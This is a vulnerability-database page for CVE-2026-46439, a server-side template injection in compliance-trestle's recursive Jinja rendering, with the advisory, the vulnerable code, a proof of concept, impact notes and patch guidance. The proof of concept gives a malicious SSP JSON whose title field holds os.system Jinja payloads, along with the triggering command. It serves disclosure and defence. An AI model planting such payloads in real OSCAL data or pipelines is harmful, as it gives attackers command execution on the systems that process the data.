compliance-trestle CVE-2026-46439
HIGHSeverity by source
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Lifecycle Timeline
2DescriptionGitHub Advisory
A High severity Server-Side Template Injection (SSTI) vulnerability exists in the trestle author jinja command. The command recursively evaluates rendered templates, allowing an attacker to achieve arbitrary command execution with privileges of the running process by injecting malicious payloads into data fields (such as SSP documents or Lookup Tables).
The vulnerability does not require attacker control of the template itself. Only attacker-controlled input data rendered into a trusted template is required.
This distinction is critical: the template author may only intend to render plain text (e.g., Title: {{ ssp.metadata.title }}), but because of the recursive parsing, the data field itself becomes executable.
The vulnerability is caused by recursive re-compilation and re-rendering of already-rendered output.
Details
In trestle/core/commands/author/jinja.py, the render_template method performs recursive template evaluation to allow nesting within expressions:
@staticmethod
def render_template(template: Template, lut: Dict[str, Any], template_folder: pathlib.Path) -> str:
new_output = template.render(**lut)
output = ''
error_countdown = JinjaCmd.max_recursion_depth
while new_output != output and error_countdown > 0:
error_countdown = error_countdown - 1
output = new_output
random_name = uuid.uuid4()
dict_loader = DictLoader({str(random_name): new_output})
# jinja_env does not use SandboxedEnvironment
jinja_env = Environment(
loader=ChoiceLoader([dict_loader, FileSystemLoader(template_folder)]),
extensions=extensions(),
autoescape=True,
trim_blocks=True
)
template = jinja_env.get_template(str(random_name))
new_output = template.render(**lut)
return outputWhen a fully trusted and static template resolves a variable from an attacker-controlled data source, the attacker's string is injected into the output. During the next pass of the while loop, this output is loaded into a new Environment via DictLoader and rendered again. Because jinja_env does not use SandboxedEnvironment, attacker-controlled template expressions embedded in data fields are re-evaluated as executable Jinja templates during recursive rendering.
PoC (Proof of Concept)
The vulnerability survives even when the template itself is fully trusted and static. Tested on Jinja2 version 3.1.6.
- Create a fully trusted template (
template.j2) that simply renders a data variable from an external SSP model:
Title: {{ ssp.metadata.title }}- Generate a malicious OSCAL SSP document (
system-security-plans/malicious_ssp/system-security-plan.json) where the title field contains a Jinja execution payload. This demonstrates how data becomes code execution:
{
"system-security-plan": {
"uuid": "208dbe11-e6e2-411a-af18-095cd17a6a70",
"metadata": {
"title": "{{ namespace.__init__.__globals__.os.system('touch poc.txt') }}",
"last-modified": "2024-01-01T00:00:00+00:00",
"version": "1.0",
"oscal-version": "1.0.4"
},
"import-profile": { "href": "trestle://profiles/test_profile/profile.json" }
}
}- Execute the
trestle author jinjacommand against the malicious data:
trestle author jinja -i template.j2 -o out.md -ssp malicious_ssp*(Note: A similar payload injected via the -lut yaml argument yields identical results.)*
- Verify arbitrary command execution:
ls poc.txt
# The file poc.txt is successfully created on the filesystem.An attacker can also execute arbitrary shell commands directly, e.g.:
"title": "{{ namespace.__init__.__globals__.os.system('id') }}",Impact
This vulnerability allows arbitrary command execution with the privileges of the running process. If compliance-trestle is used in an automated pipeline (such as CI/CD workflows generating documentation from third-party vendor-supplied SSPs), a malicious payload embedded in a data field (like a system title or description) will result in a compromised runner environment. The user/operator must process the attacker-controlled SSP or LUT, satisfying the user interaction metric.
AnalysisAI
Server-side template injection in the compliance-trestle trestle author jinja command enables arbitrary command execution when operators process attacker-controlled OSCAL data (SSP documents or Lookup Tables). Because the renderer recursively re-evaluates already-rendered output through a non-sandboxed Jinja2 Environment, malicious Jinja expressions placed in data fields like a system title are executed in a second pass even when the template itself is trusted and static. A proof-of-concept is published in the GHSA advisory; no public exploit identified at time of analysis as actively used in the wild, and the issue is not on CISA KEV.
Technical ContextAI
compliance-trestle is a Python (pip package) OSCAL authoring toolkit maintained by the oscal-compass project. The vulnerable code in trestle/core/commands/author/jinja.py implements render_template using a while loop that repeatedly compiles the previous render output as a new Jinja2 template via DictLoader inside a standard jinja2.Environment - explicitly not a SandboxedEnvironment. This realizes CWE-94 (Improper Control of Generation of Code, 'Code Injection') as classic SSTI: data fields become executable code on the second pass, allowing payloads such as {{ namespace.__init__.__globals__.os.system(...) }} to escape Jinja and reach Python's os.system. Affected packages per the GHSA are pkg:pip/compliance-trestle versions <= 3.12.1 and >= 4.0.0, < 4.0.3.
RemediationAI
Vendor-released patch: upgrade compliance-trestle to 3.12.2 (3.x branch) or 4.0.3 (4.x branch); the fixes are in commits 247fcce289f60103f3d8e28d8ec51a6986b94fb6 and 7d107b3ac53caca7bde97a6278b23cd739d94525, which remove the recursive while loop in render_template so templates are rendered exactly once and attacker-controlled data is no longer re-compiled as Jinja. If immediate upgrade is not possible, stop running trestle author jinja against any SSP, profile, or LUT obtained from untrusted parties and require human review of OSCAL data before pipeline ingestion; in CI/CD, isolate the runner (ephemeral container, no production credentials, network egress restrictions) to contain RCE if a malicious artifact is processed. Note the trade-off: disabling the jinja author flow blocks automated documentation generation, and the upstream fix also removes the nested-expression recursion feature, so any internal templates that relied on rendering one Jinja expression to produce another will need to be flattened. Reference the advisory at https://github.com/oscal-compass/compliance-trestle/security/advisories/GHSA-gg2g-p7xc-qqmm.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-94 – Code Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-gg2g-p7xc-qqmm